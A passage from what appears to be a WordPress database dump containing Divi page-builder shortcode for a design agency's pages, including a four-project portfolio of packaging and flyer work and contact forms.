animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-04 18:54:58','2020-08-04 18:54:58','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/04/392-revision-v1/',0,'revision','',0),(396,1,'2020-08-04 18:58:07','2020-08-04 18:58:07','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"|||\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>Our work</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off%22\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Projects Section\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"50px||50px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 01\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]01\r[/et_pb_text][et_pb_cta title=\"Wet & Dry - Corporate Catalogue\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"4.5.2\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p>A Corporate Brochure/ Product Catalogue to represent the key USPs of the brand and company as a whole. Wonderful graphic designing and beautiful product shots to make the product and brand stand out for an awesome b2b representaiton.</p>[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-b1-1.jpg\" alt=\"digital agency in delhi\" title_text=\"800x800 b1 (1)\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 02\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"best creative agency\" title_text=\"Creative graphic designing\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]02\r[/et_pb_text][et_pb_cta title=\"Neud Hair Spray - Product Packaging\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"4.5.2\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" content__hover_enabled=\"on|desktop\"]<p>The product packaging design is planned keeping in mind the rich and luxory look. The brand colors has been used in an effective arrangement to carry the product family design language and keeping it unique at the same time. Wonderfully executed 3D Mockup.</p>[/et_pb_cta][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 03\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]03\r[/et_pb_text][et_pb_cta title=\"Zap Booking - Flyer/Emailer Design\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"4.5.2\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p>A well structure template has been adopted with the use of brillinat cover image as a hook up factor. Various color has been used to keep the destination identity uniquely defined. Adopted to html emailers for digital campaign.</p>[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-Fl-copy-2.jpg\" alt=\"Flyer Design \" title_text=\"Flyer Design-graphic design work\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 04\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]04\r[/et_pb_text][et_pb_cta title=\"Neud After Lotion - Packaging\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p>Yet another revolutionary product with brilliant design execution. Corporate brand colors has been used to give it a rich and luxurious feel. Brilliant product mockup and various concept based mockup has given life to the product.</p>[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" 